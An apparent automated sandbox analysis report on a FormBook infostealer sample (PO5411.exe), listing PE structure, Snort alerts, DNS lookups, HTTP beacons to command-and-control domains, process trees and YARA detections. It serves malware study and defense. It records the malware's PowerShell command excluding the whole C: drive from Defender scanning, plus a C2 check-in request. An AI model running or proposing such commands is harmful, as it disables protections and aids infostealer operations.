                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x738210x4a.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x740000xcbfa.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x718710x71a00False0.979976708608data7.98627368188IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x740000xcbfa0xcc00False0.31765088848data5.13702603036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x820000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x740a40x1c7aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  RT_ICON0x75d420x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 49407, next used block 4294909696
                                                  RT_ICON0x79f8e0x25a8data
                                                  RT_ICON0x7c55a0x1a68data
                                                  RT_ICON0x7dfe60x10a8data
                                                  RT_ICON0x7f0b20x988data
                                                  RT_ICON0x7fa5e0x6b8data
                                                  RT_ICON0x8013a0x468GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON0x805de0x76data
                                                  RT_VERSION0x806900x344data
                                                  RT_MANIFEST0x80a100x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright GitHub 2013-2015
                                                  Assembly Version1.1.1.0
                                                  InternalNameGjflivyin.exe
                                                  FileVersion1.1.1.0
                                                  CompanyNameGitHub
                                                  LegalTrademarks
                                                  CommentsUpdate
                                                  ProductNameUpdate
                                                  ProductVersion1.1.1.0
                                                  FileDescriptionUpdate
                                                  OriginalFilenameGjflivyin.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  04/12/21-08:31:28.992563TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4107.180.0.224
                                                  04/12/21-08:31:28.992563TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4107.180.0.224
                                                  04/12/21-08:31:28.992563TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4107.180.0.224

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 12, 2021 08:31:17.540937901 CEST4976580192.168.2.4104.21.21.198
                                                  Apr 12, 2021 08:31:17.581868887 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.581969976 CEST4976580192.168.2.4104.21.21.198
                                                  Apr 12, 2021 08:31:17.582288027 CEST4976580192.168.2.4104.21.21.198
                                                  Apr 12, 2021 08:31:17.623135090 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.651457071 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.651494980 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.651511908 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.651669025 CEST8049765104.21.21.198192.168.2.4
                                                  Apr 12, 2021 08:31:17.651696920 CEST4976580192.168.2.4104.21.21.198
                                                  Apr 12, 2021 08:31:17.651743889 CEST4976580192.168.2.4104.21.21.198
                                                  Apr 12, 2021 08:31:17.651782036 CEST4976580192.168.2.4104.21.21.198

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 12, 2021 08:29:09.689091921 CEST6464653192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:09.756867886 CEST53646468.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:16.240206003 CEST6529853192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:16.288959026 CEST53652988.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:18.298758030 CEST5912353192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:18.350373030 CEST53591238.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:19.291088104 CEST5453153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:19.339782953 CEST53545318.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:20.191190958 CEST4971453192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:20.240071058 CEST53497148.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:24.417898893 CEST5802853192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:24.466712952 CEST53580288.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:26.864326954 CEST5309753192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:26.913166046 CEST53530978.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:35.518855095 CEST4925753192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:35.567619085 CEST53492578.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:38.847893000 CEST6238953192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:38.905813932 CEST53623898.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:39.133825064 CEST4991053192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:39.193563938 CEST53499108.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:39.252496958 CEST5585453192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:39.305553913 CEST53558548.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:44.119465113 CEST6454953192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:44.179342031 CEST53645498.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:46.135224104 CEST6315353192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:46.183814049 CEST53631538.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:49.874079943 CEST5299153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:49.925649881 CEST53529918.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:50.735461950 CEST5370053192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:50.788461924 CEST53537008.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:51.553251982 CEST5172653192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:51.604720116 CEST53517268.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:52.333544970 CEST5679453192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:52.382057905 CEST53567948.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:55.786731005 CEST5653453192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:55.893635035 CEST53565348.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:56.482884884 CEST5662753192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:56.542773962 CEST53566278.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:57.297662020 CEST5662153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:57.354563951 CEST53566218.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:57.622983932 CEST6311653192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:57.687915087 CEST53631168.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:57.793287039 CEST6407853192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:57.901309967 CEST53640788.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:58.439610004 CEST6480153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:58.573520899 CEST53648018.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:59.119820118 CEST6172153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:59.177005053 CEST53617218.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:29:59.709749937 CEST5125553192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:29:59.840107918 CEST53512558.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:00.617716074 CEST6152253192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:00.669222116 CEST53615228.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:02.004977942 CEST5233753192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:02.062079906 CEST53523378.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:03.000212908 CEST5504653192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:03.058254004 CEST53550468.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:04.448206902 CEST4961253192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:04.505569935 CEST53496128.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:04.883795023 CEST4928553192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:04.935234070 CEST53492858.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:05.839901924 CEST5060153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:05.891462088 CEST53506018.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:13.737868071 CEST6087553192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:13.790977001 CEST53608758.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:13.829435110 CEST5644853192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:13.894584894 CEST53564488.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:16.477452993 CEST5917253192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:16.535996914 CEST53591728.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:18.568561077 CEST6242053192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:18.617214918 CEST53624208.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:24.856779099 CEST6057953192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:24.905962944 CEST53605798.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:25.836014986 CEST5018353192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:25.887552977 CEST53501838.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:26.842058897 CEST6153153192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:26.890742064 CEST53615318.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:30.704874039 CEST4922853192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:30.754034996 CEST53492288.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:49.498928070 CEST5979453192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:49.547597885 CEST53597948.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:30:51.607350111 CEST5591653192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:30:51.674254894 CEST53559168.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:31:17.445863962 CEST5275253192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:31:17.522396088 CEST53527528.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:31:22.667948961 CEST6054253192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:31:23.062679052 CEST53605428.8.8.8192.168.2.4
                                                  Apr 12, 2021 08:31:28.780127048 CEST6068953192.168.2.48.8.8.8
                                                  Apr 12, 2021 08:31:28.855889082 CEST53606898.8.8.8192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 12, 2021 08:29:39.133825064 CEST192.168.2.48.8.8.80x2432Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:17.445863962 CEST192.168.2.48.8.8.80x6899Standard query (0)www.movementinspires.comA (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:22.667948961 CEST192.168.2.48.8.8.80xaffcStandard query (0)www.013y.comA (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:28.780127048 CEST192.168.2.48.8.8.80xa525Standard query (0)www.volmaqhsogroup.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 12, 2021 08:29:39.193563938 CEST8.8.8.8192.168.2.40x2432No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                                                  Apr 12, 2021 08:31:17.522396088 CEST8.8.8.8192.168.2.40x6899No error (0)www.movementinspires.com104.21.21.198A (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:17.522396088 CEST8.8.8.8192.168.2.40x6899No error (0)www.movementinspires.com172.67.200.20A (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:23.062679052 CEST8.8.8.8192.168.2.40xaffcNo error (0)www.013y.com104.164.33.210A (IP address)IN (0x0001)
                                                  Apr 12, 2021 08:31:28.855889082 CEST8.8.8.8192.168.2.40xa525No error (0)www.volmaqhsogroup.comvolmaqhsogroup.comCNAME (Canonical name)IN (0x0001)
                                                  Apr 12, 2021 08:31:28.855889082 CEST8.8.8.8192.168.2.40xa525No error (0)volmaqhsogroup.com107.180.0.224A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.movementinspires.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.449765104.21.21.19880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 12, 2021 08:31:17.582288027 CEST5850OUTGET /pnqr/?rZULMf_=947cDAfMtsIS/zejVd4hkXb2b5N+AxK6ZTWGMEGb/CYmLctFgtEwYesMNqUKu8NWWTag&FtgT=MXyTezehH HTTP/1.1
                                                  Host: www.movementinspires.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Apr 12, 2021 08:31:17.651457071 CEST5852INHTTP/1.1 404 Not Found
                                                  Date: Mon, 12 Apr 2021 06:31:17 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: __cfduid=d959913b96847f506eacf9e36643cadec1618209077; expires=Wed, 12-May-21 06:31:17 GMT; path=/; domain=.movementinspires.com; HttpOnly; SameSite=Lax
                                                  X-Frame-Options: deny
                                                  CF-Cache-Status: DYNAMIC
                                                  cf-request-id: 096660116e00004ec89d111000000001
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BWZXmVIHl%2BsUq6hhobMFjnqZJc2mMnUT2HOG%2F9b63aN70uNDb%2FC6FQSR7prKw86mj9YVVsDosUOXWBGQXck%2FEmD95DpCPKczlCBvgo7AySNSiFUQN5yifsc%3D"}],"max_age":604800,"group":"cf-nel"}
                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 63ea692f18cb4ec8-FRA
                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 35 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e
                                                  Data Ascii: 554<!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style>
                                                  Apr 12, 2021 08:31:17.651494980 CEST5852INData Raw: 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c
                                                  Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices -->
                                                  Apr 12, 2021 08:31:17.651511908 CEST5852INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: PO5411.exe PID: 6788 Parent PID: 5860

                                                  General

                                                  Start time:08:29:17
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\PO5411.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\PO5411.exe'
                                                  Imagebase:0x490000
                                                  File size:518656 bytes
                                                  MD5 hash:3CD76D38AD07C345862B07D90186851E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.647947082.0000000000492000.00000002.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.788482651.00000000028F6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.784541323.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.789244532.00000000038F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.789816893.00000000039F3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.779197131.0000000000492000.00000002.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000003.776623532.0000000003A8E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 1368 Parent PID: 6788

                                                  General

                                                  Start time:08:30:17
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'powershell' Add-MpPreference -ExclusionPath C:\
                                                  Imagebase:0x110000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 4500 Parent PID: 1368

                                                  General

                                                  Start time:08:30:17
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: PO5411.exe PID: 6140 Parent PID: 6788

                                                  General

                                                  Start time:08:30:18
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\PO5411.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\PO5411.exe
                                                  Imagebase:0x7b0000
                                                  File size:518656 bytes
                                                  MD5 hash:3CD76D38AD07C345862B07D90186851E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.848830027.00000000007B2000.00000002.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.849226425.0000000000CB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.849831780.00000000010B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000000.777631981.00000000007B2000.00000002.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\PO5411.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 21%, ReversingLabs
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6140

                                                  General

                                                  Start time:08:30:23
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6fee60000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 5960 Parent PID: 3424

                                                  General

                                                  Start time:08:30:48
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                  Imagebase:0x11d0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.912382912.0000000000E40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.912869923.000000000105D000.00000004.00000020.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.914839428.0000000003B07000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.912991547.0000000001150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
